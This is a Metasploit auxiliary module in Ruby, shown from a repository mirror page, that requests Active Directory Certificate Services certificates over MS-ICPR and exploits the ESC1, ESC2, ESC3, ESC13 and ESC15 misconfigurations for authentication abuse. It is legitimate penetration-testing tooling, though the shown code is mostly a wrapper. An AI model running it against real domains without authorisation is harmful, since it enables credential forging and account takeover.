Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/dcerpc/icpr_cert.rb
32495 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'ruby_smb/dcerpc/client'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::MsIcpr

10
  include Msf::Exploit::Remote::SMB::Client::Authenticated

11
  include Msf::Exploit::Remote::DCERPC

12
  include Msf::Auxiliary::Report

13
  include Msf::OptionalSession::SMB

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'ICPR Certificate Management',

20
        'Description' => %q{

21
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate

22
          template's configuration the resulting certificate can be used for various operations such as authentication.

23
          PFX certificate files that are saved are encrypted with a blank password.

24


25
          This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Will Schroeder', # original idea/research

30
          'Lee Christensen', # original idea/research

31
          'Oliver Lyak', # certipy implementation

32
          'Spencer McIntyre'

33
        ],

34
        'References' => [

35
          [ 'URL', 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],

36
          [ 'URL', 'https://github.com/GhostPack/Certify' ],

37
          [ 'URL', 'https://github.com/ly4k/Certipy' ],

38
          [ 'ATT&CK', Mitre::Attack::Technique::T1649_STEAL_OR_FORGE_AUTHENTICATION_CERTIFICATES ]

39
        ],

40
        'Notes' => {

41
          'Reliability' => [],

42
          'Stability' => [],

43
          'SideEffects' => [ IOC_IN_LOGS ],

44
          'AKA' => [ 'Certifry', 'Certipy' ]

45
        },

46
        'Actions' => [

47
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]

48
        ],

49
        'DefaultAction' => 'REQUEST_CERT'

50
      )

51
    )

52
  end

53


54
  def run

55
    send("action_#{action.name.downcase}")

56
  rescue MsIcprConnectionError, SmbIpcConnectionError => e

57
    fail_with(Failure::Unreachable, e.message)

58
  rescue MsIcprAuthenticationError, MsIcprAuthorizationError, SmbIpcAuthenticationError => e

59
    fail_with(Failure::NoAccess, e.message)

60
  rescue MsIcprNotFoundError => e

61
    fail_with(Failure::NotFound, e.message)

62
  rescue MsIcprUnexpectedReplyError => e

63
    fail_with(Failure::UnexpectedReply, e.message)

64
  rescue MsIcprUnknownError => e

65
    fail_with(Failure::Unknown, e.message)

66
  end

67


68
  def action_request_cert

69
    with_ipc_tree do |opts|

70
      request_certificate(opts)

71
    end

72
  end

73


74
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.

75
  # @return [void]

76
  def with_ipc_tree

77
    opts = {}

78
    if session

79
      print_status("Using existing session #{session.sid}")

80
      self.simple = session.simple_client

81
      opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")

82
    end

83


84
    yield opts

85
  ensure

86
    opts[:tree].disconnect! if opts[:tree]

87
  end

88
end

89


90